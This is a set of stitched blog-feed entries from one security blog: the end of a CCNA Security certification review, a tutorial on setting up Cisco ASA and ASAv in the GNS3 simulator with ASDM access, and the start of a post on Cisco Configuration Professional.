the security area will also enjoy the parts about the threats and <span class="caps">PKI</span>
infrastructures, but the theoretical knowledge does not go very far beyond that.</p>
<p>After that the curriculum seems boils down to a catalogue of features,
each one with its own succession of screenshots, web interface menus and
command-line options to learn.</p>
<ul>
<li>The threats remain theoretical, you are solving problems you don’t known
practically know and never experienced or verified for yourself.
In other words, you are more taught <em>good practices</em>.</li>
<li>The features are analyzed individually, with very little perspective onto
the global network architecture and how each elements are organized and
react with each other.
For instance individual chapters describe centralized authentication, <span class="caps">SCEP</span>
and site-to-site <span class="caps">VPN</span>, but how they could be securely to associate them is
off-topic (but most probably covered in the <span class="caps">CCNP</span> curriculum).</li>
</ul>
<p>Depending on your affinities and the reasons why you choose a <span class="caps">CCNA</span> Security
certification, I would recommend you to accompany this certification with
at least another one:</p>
<ul>
<li>
<p>If you are more interested in the security aspect, you should highly
benefit from a general security certification, like a <a href="/posts/2017/10/04/ec-council-ceh-certification-review/" title="EC-Council CEH certification review"><span class="caps">CEH</span></a> for instance.
This will provide you a better understanding of the threats, allowing to
take more appropriate decisions.</p>
</li>
<li>
<p>If you are more interested in Cisco technologies, I think you should take
the step and push toward the <span class="caps">CCNP</span> Security.
I did not took this one so I cannot vouch for it, but it should allow you
to become more intimate with Cisco technologies than the introduction
provided in the <span class="caps">CCNA</span>, making you more efficient and more apt to take the
right decisions or react correctly in case of unforeseen events.</p>
</li>
</ul>
<h4 id="exam"><a class="toclink" href="#exam">Exam</a></h4>
<p>Similarly to the <span class="caps">CCNA</span> R&S, the question themselves are clear and non-ambiguous,
even-though as mentioned above they follow a topic list which noticeably differs
from the one available on Cisco website and in its official certification guide.</p>
<p>As a self-learner, you must therefore do your own investigations to discover the
topic effectively covered by the exam.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Having been through this myself, I’ve shared with you in this post the
complete list of topics which I find to be asked in <span class="caps">CCNA</span> Security exams and
missing in Cisco’s official certification guide.</p>
<p>So <em>maybe</em> this list may save you some investigation time so you can more
focus on your study, at least I hope so!</p>
<p>Don’t take it for granted, though, as Cisco regularly updates its questions
sets and may include new, unmentioned topics.</p>
</div>
<p>The exam engine is… crap.</p>
<p>Yeah, I already knew it from my <span class="caps">CCNA</span> R&S exam so I was expecting the broken
<span class="caps">XML</span> tags and attributes in the questions and answers, but here I got a <span class="caps">BSOD</span>,
a Windows Blue Screen of Death right in the middle of the exam (while the
engine was loading a simulation lab).</p>
<p>How is that even possible that a simple exam engine could make the whole
operating system crash?</p>
<p>Needless to say I was very worry and my first reaction was, breaking the rule,
to directly get up and fetch one of the responsible of the exam center less to
get technical assistance than to get an official witness in case I would fail
the exam because of this.</p>
<p>Fortunately, once Windows restarted, the exam went on as usual, at the
current question, current time and keeping all previously saved answers.
What a relief, but still: this is not what I would call good or comfortable
exam conditions<sup id="fnref-exam_bugs"><a class="footnote-ref" href="#fn-exam_bugs">3</a></sup>.</p>
<h4 id="conclusion"><a class="toclink" href="#conclusion">Conclusion</a></h4>
<p>Unless you need this very certification to meet some <span class="caps">US</span> governmental contract
prerequisites, I would not recommend taking this certification alone.</p>
<p>I would however recommend it mainly in those two situations:</p>
<ul>
<li>
<p>As a complement of a more general security learning path, to dig a bit
deeper some protocols such as IPSec which is often mentioned but rarely
studied elsewhere and familiarize yourself with Cisco’s approach to security.
This is why I chose it personally, and I really don’t regret it.</p>
</li>
<li>
<p>As a first step to get your <span class="caps">CCNP</span> Security and become an actual Cisco
Security Professional.</p>
</li>
</ul>
<div class="footnote">
<hr/>
<ol>
<li id="fn-acs-version">
<p>This links leads to the documentation of the version 5.6 of <span class="caps">ACS</span>.
To access a different version or if this one is not found, simply change the
version number in the <span class="caps">URL</span> as the path itself remains constant over <span class="caps">ACS</span> versions. <a class="footnote-backref" href="#fnref-acs-version" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
<li id="fn-failure">
<p>Some gossips say that this may be a voluntary move from Cisco in
order to bill more exams and put forward their official, expensive training
sessions.
Personally, I believe in the
<em>“Don’t see malignity where there is just stupidity”</em> and I think that Cisco
just do not care.
There is too few money to make on people training using books and free
simulators, so there is no business reason to invest money on them either.
This is not a matter of thinking of strategies to push people to pay more, this
is simply a matter of reducing funding where the <span class="caps">ROI</span> is not profitable enough. <a class="footnote-backref" href="#fnref-failure" title="Jump back to footnote 2 in the text">↩</a></p>
</li>
<li id="fn-exam_bugs">
<p>I passed nearly a dozen of exams in the same test center, I
encountered such issues only with Cisco exams.
These issues seem therefore unrelated to the exam center itself but really
caused by Cisco’s specific exam engine. <a class="footnote-backref" href="#fnref-exam_bugs" title="Jump back to footnote 3 in the text">↩</a></p>
</li>
</ol>
</div>How to install Cisco Adaptative Security Appliance (ASA) in GNS32017-08-28T00:00:00+02:002017-08-28T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/<p>The Cisco <em><a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html" rel="external" title="Cisco Adaptative Security Appliance (ASA) Software homepage (Cisco)">Adaptative Security Appliance</a></em> (<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>) is Cisco’s main
firewall and network security product.
It mainly provides firewall and <span class="caps">VPN</span> services, but its native features can be
enhanced with the addition of <a href="https://www.cisco.com/c/en/us/products/security/ngips/index.html" rel="external" title="Next-Generation Intrusion Prevention System (NGIPS) (Cisco)">FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr></a> services
<a href="https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html" rel="external" title="Cisco ASA 5500-X with FirePOWER Services (Cisco)">on top of it</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Even when used on top of an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in the same appliance, the FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr>
is never really merged within the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> but stays a separate module.
For instance, the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and the FirePOWER each have their own separate <span class="caps">CLI</span>
shell, each with their own different syntax and logic.
In fact FirePOWER is not a Cisco development but has been acquired when
Cisco merged with SourceFire, hence the (personal) feeling of an “alien”
product plugged into the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</p>
<p>For <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security students, while you must know <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and be comfortable with
its usage, as for now you only need to know what FirePOWER is and why it is used …</p></div><p>The Cisco <em><a href="https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html" rel="external" title="Cisco Adaptative Security Appliance (ASA) Software homepage (Cisco)">Adaptative Security Appliance</a></em> (<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>) is Cisco’s main
firewall and network security product.
It mainly provides firewall and <span class="caps">VPN</span> services, but its native features can be
enhanced with the addition of <a href="https://www.cisco.com/c/en/us/products/security/ngips/index.html" rel="external" title="Next-Generation Intrusion Prevention System (NGIPS) (Cisco)">FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr></a> services
<a href="https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html" rel="external" title="Cisco ASA 5500-X with FirePOWER Services (Cisco)">on top of it</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Even when used on top of an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in the same appliance, the FirePOWER <abbr title="Next-Generation Intrustion Detection System"><span class="caps">NGIDS</span></abbr>
is never really merged within the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> but stays a separate module.
For instance, the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and the FirePOWER each have their own separate <span class="caps">CLI</span>
shell, each with their own different syntax and logic.
In fact FirePOWER is not a Cisco development but has been acquired when
Cisco merged with SourceFire, hence the (personal) feeling of an “alien”
product plugged into the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</p>
<p>For <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security students, while you must know <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> and be comfortable with
its usage, as for now you only need to know what FirePOWER is and why it is used.</p>
</div>
<p>Cisco <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> can be obtained from various channels:</p>
<ul>
<li>
<p>Cisco <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> entry-level devices target <abbr title="Small Office / Home Office"><span class="caps">SOHO</span></abbr> market and can be bought
second-hand for a few dozen of dollars, and brand new for a few hundreds.</p>
</li>
<li>
<p>Like with the <span class="caps">IOS</span> devices, it is possible to extract the required files
from an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device to use them in a virtualized environment.
As far as the <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security curriculum is concerned, even old images
are enough for your studies.
Being real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images, they provide the same functionality and react the
same way as real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> appliances (including vulnerabilities).</p>
</li>
<li>
<p>For training purposes, Cisco’s network simulator <span class="caps">VIRL</span> provides ASAv, an
<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> simulator.
However, as with any simulator, it may not offer the same features
(last time I checked for instance failover was not supported) or react
the same way than real gear.</p>
</li>
</ul>
<p>The <span class="caps">GNS3</span> simulator doesn’t recommend using <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images but advise to use ASAv
instead.
Personally I did not encounter any issue with the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> images, but that’s most
probably because I was satisfied with a old image (<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4.2) and basic
features.
These a enough for a <abbr title="Cisco Certified Network Associate"><span class="caps">CCNA</span></abbr> Security training.</p>
<h3 id="prerequisites"><a class="toclink" href="#prerequisites">Prerequisites</a></h3>
<p>To install <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> you will need the:</p>
<ul>
<li>
<p><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> itself, depending on the version you chose:</p>
<ul>
<li>real <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>: you need its Linux kernel (<em>asa842-vmlinuz</em> for instance) and
Initial <span class="caps">RAM</span> disk (<em>asa842-initrd.gz</em> for instance) files.</li>
<li>ASAv emulator: it usually comes as a virtual machine file, such as
<em>asav9</em>*<em>.qcow2</em>.</li>
</ul>
</li>
<li>
<p><abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>: this is <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">GUI</span>, coming as a file such as <em>asdm-7</em>*<em>.bin</em>.
Be sure to <a href="http://www.cisco.com/c/en/us/td/docs/security/asa/compatibility/asamatrx.html#48552" rel="external" title="ASA and ASDM Compatibility (Cisco)">check</a> that the version of <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> and <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> you are
using are compatible.</p>
</li>
<li>
<p>A Windows host or virtual machine to administrate the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</p>
</li>
<li>
<p>Java must be installed on the Windows host.</p>
</li>
<li>
<p>A <span class="caps">TFTP</span> server for Windows (such as <a href="http://tftpd32.jounin.net/tftpd32_download.html" rel="external" title="tftpd32 project homepage">tftpd32</a>, a portable edition is
available which does not require installation on the host).</p>
</li>
</ul>
<p>Setting up an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server requires three steps:</p>
<ol>
<li>Booting <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</li>
<li>Configuring <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>.</li>
<li>Copy <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> onto the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</li>
</ol>
<h3 id="installation-process"><a class="toclink" href="#installation-process">Installation process</a></h3>
<h4 id="booting-asa"><a class="toclink" href="#booting-asa">Booting <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr></a></h4>
<h5 id="asa-84"><a class="toclink" href="#asa-84"><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4</a></h5>
<p>Setting-up <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> in <span class="caps">GNS3</span> is described by Anthony Sequeira in
<a href="https://www.youtube.com/watch?v=ubyZGXjUsjs" rel="external" title="MicroNugget: The ASA in GNS3 (YouTube)">this video</a>, in particular from the fourth minute onward.
While this video relies on a old version of <span class="caps">GNS3</span>, the process remains similar:</p>
<ol>
<li>From <span class="caps">GNS3</span> toolbar, go in <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> window.</li>
<li>In the <em><span class="caps">QEMU</span></em> > <em>Qemu VMs</em> section, click the <em>New</em> button to create a new
virtual machine.</li>
<li>Be sure to tick the <em>This is a legacy <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">VM</span></em> checkbox.
<span class="caps">GNS3</span> may display a warning recommending to use ASAv instead, but this is
fine (see my comment above on this subject).</li>
<li>Keep the default value for the <span class="caps">RAM</span> amount and console type, when requested
about the disk image choose to generate a new disk image.
<span class="caps">GNS3</span> should display a <em>Create</em> button to create the image directly from
within <span class="caps">GNS3</span>.
Here again, default values are fine.</li>
<li>Select the location of your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> kernel and Initial <span class="caps">RAM</span> disk files.</li>
<li>Once the device template is created, go in its settings and, under the
<em>Advanced</em> tab, uncheck the <em>Use as a linked base <span class="caps">VM</span></em> (we will check this
option back once the installation is ended,
<a href="http://127.0.0.1:8000/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" rel="external" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ol>
<h5 id="asav"><a class="toclink" href="#asav">ASAv</a></h5>
<p>Valerian Ceaus made a <a href="http://blog.ialex.info/configuring-cisco-asav-9-x-on-gns3-1-4-x/" rel="external" title="Configuring Cisco ASAv 9.x on GNS3 1.4.x (DNT team blog)">nice article</a> about on running ASAv in <span class="caps">GNS3</span>.</p>
<p>You need to follow those steps:</p>
<ol>
<li>Define a new Qemu <span class="caps">VM</span>, but this time leave <em>This is a legacy <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> <span class="caps">VM</span></em>
unchecked to create a standard Qemu virtual machine.</li>
<li><em><span class="caps">RAM</span></em>: 2048 <span class="caps">MB</span></li>
<li><em>Console type</em>: vnc</li>
<li><em>Disk image</em>: Browse to your ASAv image file.</li>
<li>Edit the properties of the newly created virtual machine:<ul>
<li><em>General settings</em><ul>
<li><em>Symbol</em>: asa</li>
<li><em>Category</em>: Security devices</li>
<li><em><span class="caps">RAM</span></em>: 2048 <span class="caps">MB</span></li>
<li><em>Console type</em>: vnc</li>
</ul>
</li>
<li><em>Network</em>:<ul>
<li><em>Adapters</em>: 4</li>
</ul>
</li>
<li><em>Advanced settings</em><ul>
<li><em>Optimizations</em><ul>
<li><em>Activate <span class="caps">CPU</span> throttling</em>: <span class="caps">YES</span></li>
<li><em>Percentage of <span class="caps">CPU</span> allowed</em>: 80 %</li>
</ul>
</li>
<li><em>Additional settings</em><ul>
<li><em>Options</em> = <code>-cpu Haswell -smp 4,sockets=4,cores=1,threads=1 -k fr</code>
(personalize <code>-k fr</code>) to whatever your keyboard layout is,
available layouts are usually stored below the
<em>/usr/share/qemu/keymaps/</em> directory).</li>
<li><em>Use as a linked base <span class="caps">VM</span></em>: <span class="caps">NO</span> (we will re-enable it at the end
of the installation process,
<a href="http://127.0.0.1:8000/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/#linked-base-vms" rel="external" title="How to add virtual machines: Linked base VMs">more information on linked base VMs</a>).</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ol>
<p>ASAv devices use <span class="caps">VNC</span> console by default.
If you prefer to switch to a serial (“telnet” from <span class="caps">GNS3</span> point-of-view) console,
<a href="http://blog.ialex.info/configuring-cisco-asav-9-x-on-gns3-1-4-x/" rel="external" title="Configuring Cisco ASAv 9.x on GNS3 1.4.x (DNT team blog)">Valerian</a> already gives some information but you may want to read this
<a href="https://gns3.com/discussions/how-to-configure-any-asav-qcow2-" rel="external" title="How to configure any ASAv .qcow2 image for serial telnet access (GNS3 forum)"><span class="caps">GNS3</span> forum thread</a>.</p>
<h4 id="asa-initial-configuration"><a class="toclink" href="#asa-initial-configuration"><abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> initial configuration</a></h4>
<p>Create a new topolgy and use a standard <span class="caps">GNS3</span> switch to link your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device
with a Windows host you will use to manage it.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="Topology including an ASA server, a basic switch and a Windows host" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/topology.png"/></a></span></p>
<p>Start the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> device.
Once it has booted, use <code>enable</code> to switch into <span class="caps">EXEC</span> mode.
The password to enable <span class="caps">EXEC</span> mode is empty by default (just press <em>Enter</em> when
requested for a password).</p>
<p>Available network interfaces should usually bear a name such as
<em>GigabitEthernet 0</em> or <em>Management0/0</em>.
The command to check available network interfaces is the same as on <span class="caps">IOS</span> devices:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">show</span> interface ip brief
<span class="go">Interface IP-Address OK? Method Status Protocol</span>
<span class="go">GigabitEthernet0 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet1 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet2 unassigned YES unset administratively down up</span>
<span class="go">GigabitEthernet3 unassigned YES unset administratively down up</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<p>Use the commands below to configure the network interface linking toward the
Windows management host (on ASAv use <code>int gi 0/0</code> to configure the first
network interface):</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">conf</span> t
<span class="gp">ciscoasa(config)#</span>
<span class="go">***************************** NOTICE *****************************</span>
<span class="go">Help to improve the ASA platform by enabling anonymous reporting,</span>
<span class="go">which allows Cisco to securely receive minimal error and health</span>
<span class="go">information from the device. To learn more about this feature,</span>
<span class="go">please visit: http://www.cisco.com/go/smartcall</span>
<span class="go">Would you like to enable anonymous error reporting to help improve</span>
<span class="go">the product? [Y]es, [N]o, [A]sk later: </span><span class="s">n</span>
<span class="go">In the future, if you would like to enable this feature,</span>
<span class="go">issue the command "call-home reporting anonymous".</span>
<span class="go">Please remember to save your configuration.</span>
<span class="gp">ciscoasa(config)# </span><span class="k">int</span><span class="s"> gi 0</span>
<span class="gp">ciscoasa(config-if)# </span><span class="k">ip</span> add <span class="s">192.168.0.1</span> <span class="s">255.255.255.0</span>
<span class="gp">ciscoasa(config-if)# </span><span class="k">nameif </span><span class="nv">inside</span>
<span class="go">INFO: Security level for "inside" set to 100 by default.</span>
<span class="gp">ciscoasa(config-if)# </span><span class="ow">no </span><span class="k">shutdown</span>
<span class="gp">ciscoasa(config-if)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa(config)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa# </span><span class="k">copy</span> run start
<span class="go">Source filename [running-config]?</span>
<span class="go">Cryptochecksum: d78cc3c3 00c1ebd8 dbc3b1cd 61811d56</span>
<span class="go">2024 bytes copied in 1.170 secs (2024 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Don’t forget to assign a name to the network interface using the <code>nameif</code>
command otherwise it will be unusable!</p>
</div>
<h4 id="copy-asdm-onto-the-asa-server"><a class="toclink" href="#copy-asdm-onto-the-asa-server">Copy <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> onto the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</a></h4>
<p>Here Valerian Ceaus made another <a href="http://blog.ialex.info/how-to-configure-asa-for-asdm-access/" rel="external">good post</a> to describe <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>
installation onto an <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</p>
<p>If you haven’t copied the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> file into you Windows host, this is now
the time to do it.
A convenient way to transfer them to your lab guests is to put them in an
<span class="caps">ISO</span> image which will be mounted by the guest.</p>
<p>I use <code>genisoimage</code> to generate such images.
If it is not already installed in your environment, install it (the exact
command depending on your distribution):</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>sudo aptitude install genisoimage
</pre></div>
</td></tr></table></div>
<p>The following command creates the <em>asdm.iso</em> file containing all <em>asdm</em>*<em>.bin</em>
files, the <span class="caps">TFTP</span> server and Java setup (Java 6 here as this version is a
requirement for <span class="caps">CCP</span>, if you only use <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> you should be fine with more recent
versions of Java<sup id="fnref-java_version"><a class="footnote-ref" href="#fn-java_version">1</a></sup>).</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="codehilite"><pre>genisoimage -JR -o asdm.iso asdm*.bin tftpd64.460.zip jre-6u45-windows-i586.exe
</pre></div>
</td></tr></table></div>
<p>Edit your Windows device settings, mount this <span class="caps">ISO</span> file in the <span class="caps">CD</span>-<span class="caps">ROM</span> drive, and
start your Windows host.</p>
<ol>
<li>
<p>On your Windows host, start the <span class="caps">TFTP</span> server and ensure that:</p>
<ul>
<li>The shared directory indeed contains you <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> file (<em>asdm-7</em>*<em>.bin</em>).</li>
<li>The listening interface is the external interface, reachable from the
<abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server.</li>
</ul>
</li>
<li>
<p>In the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server shell, use <span class="caps">TFTP</span> to retrieve the file:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">copy</span> tftp<span class="s">:</span> flash<span class="s">:</span>
<span class="go">Address or name of remote host []? </span><span class="s">192.168.0.100</span>
<span class="go">Source filename []? </span><span class="s">asdm-715-100.bin</span>
<span class="go">Destination filename [asdm-715-100.bin]?</span>
<span class="go">Accessing tftp://192.168.0.100/asdm-715-100.bin...!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">[truncated]</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">Writing current ASDM file disk0:/asdm-715-100.bin</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">[truncated]</span>
<span class="go">!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</span>
<span class="go">22824520 bytes copied in 66.740 secs (345826 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>You have to specify <em>flash:</em> as destination even if the file will
actually be written to <em>disk0</em> (don’t ask me why, ask Cisco!).</p>
</div>
</li>
</ol>
<p>Now enable <span class="caps">HTTPS</span> on the <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> server and set the credential and source <span class="caps">IP</span>
authorized to access <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa# </span><span class="k">conf</span> t
<span class="gp">ciscoasa(config)# </span><span class="k">username </span><span class="nv">admin </span>password <span class="s">Cisco123</span>
<span class="gp">ciscoasa(config)# </span><span class="k">aaa</span> authentication http console LOCAL
<span class="gp">ciscoasa(config)# </span><span class="k">http</span> server enable
<span class="gp">ciscoasa(config)# </span><span class="k">http </span><span class="s">192.168.0.100 255.255.255.255 </span><span class="nv">inside</span>
<span class="gp">ciscoasa(config)# </span><span class="k">asdm</span> image <span class="s">disk0:/asdm-715-100.bin</span>
<span class="gp">ciscoasa(config)# </span><span class="nb">exit</span>
<span class="gp">ciscoasa# </span><span class="k">copy</span> run start
<span class="go">Source filename [running-config]?</span>
<span class="go">Cryptochecksum: 5fa74a4e e53c0aff c21234ef a2c32a86</span>
<span class="go">2217 bytes copied in 1.90 secs (2217 bytes/sec)</span>
<span class="gp">ciscoasa#</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Here I use <em>192.168.0.100</em> which is the <span class="caps">IP</span> address of the Windows management
host, in other words the <span class="caps">IP</span> address authorized to access the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>.</p>
<p>You can replace this with the <span class="caps">IP</span> address matching you setup, you can also allow
a whole subnet to access <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> by modifying the netmask, for instance:</p>
<div class="codehilite"><pre><span class="gp">ciscoasa(config)# </span><span class="k">http </span><span class="s">192.168.0.0 255.255.255.0 </span><span class="nv">inside</span>
</pre></div>
</div>
<p>From your Windows machine, now use a browser and connect to <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr>‘s <span class="caps">HTTPS</span> port
(<em>https://192.168.0.1</em> for instance) and click on the link to install the
<abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> launcher.
Accept the certificate, type the credential you defined above, your <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> should
now be ready.</p>
<p><span class="lb-small"><a href="#welcome.png" id="welcome.png-thumb" title="Click to enlarge"><img alt="ASDM welcome screen" src="https://www.whitewinterwolf.com/posts/2017/08/28/how-to-install-cisco-adaptative-security-appliance-asa-in-gns3/welcome.png"/></a></span></p>
<h4 id="post-install"><a class="toclink" href="#post-install">Post-install</a></h4>
<p>Now that the installation is complete, don’t forget to edit the template device
settings and, below the <em>Advanced</em> tab, tick the <em>Use as a linked base <span class="caps">VM</span></em> checkbox.</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-java_version">
<p>I tested an <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> 7.1.5 with <abbr title="Adaptative Security Appliance"><span class="caps">ASA</span></abbr> 8.4.2 with the latest version
of Java (8) and Windows (2016) without encountering any issue.
The <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> link may not appear in the Widows’ <em>Start</em> menu so you need
manually start the <abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr> launcher from
<em>C:\Program Files (x86)\Cisco Systems\<abbr title="Adaptative Security Device Manager"><span class="caps">ASDM</span></abbr>\</em>. <a class="footnote-backref" href="#fnref-java_version" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>How to install Cisco Configuration Professional (CCP) in GNS32017-08-28T00:00:00+02:002017-11-23T00:00:00+01:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-28:/posts/2017/08/28/how-to-install-cisco-configuration-professional-ccp-in-gns3/<p>The <a href="https://www.cisco.com/c/en/us/products/cloud-systems-management/configuration-professional/index.html" rel="external" title="Cisco Configuration Professional (Cisco)">Cisco Configuration Professional (<span class="caps">CCP</span>)</a> is a graphical interface
allowing to quickly and easily configure, monitor and troubleshoot Cisco
<span class="caps">IOS</span>-based devices.
It does exactly the same thing as one could do using <span class="caps">IOS</span> command-line, but
using more convenient graphical tools and optional wizards for multi-steps
configuration, including operations involving several devices like setting-up
a tunnel.</p>
<p>It comes in two versions:</p>
<ul>
<li>
<p><em><span class="caps">CCP</span> 2.x</em>, also known as <em>Router and Security Device Manager Software (<span class="caps">SDM</span>)</em>,
it is the little brother of <span class="caps">ASDM</span> used to configure <span class="caps">ASA</span> firewalls.
This is a desktop application, the <span class="caps">GUI</span> is installed locally on the user’s host.</p>
</li>
<li>
<p><em><span class="caps">CCP</span> “Express” 3.x</em>: this version is deployed on the Cisco devices themselves
and leverage devices’ <span class="caps">HTTP</span> port to embed a web configuration interface.
<span class="caps">CCP</span> Express already existed in the 2.x generation, at that time two flavors
were available: the <em>“end-user”</em> one with reduced functionalities
(the end-result was …</p></li></ul><p>The <a href="https://www.cisco.com/c/en/us/products/cloud-systems-management/configuration-professional/index.html" rel="external" title="Cisco Configuration Professional (Cisco)">Cisco Configuration Professional (<span class="caps">CCP</span>)</a> is a graphical interface
allowing to quickly and easily configure, monitor and troubleshoot Cisco
<span class="caps">IOS</span>-based devices.
It does exactly the same thing as one could do using <span class="caps">IOS</span> command-line, but
using more convenient graphical tools and optional wizards for multi-steps
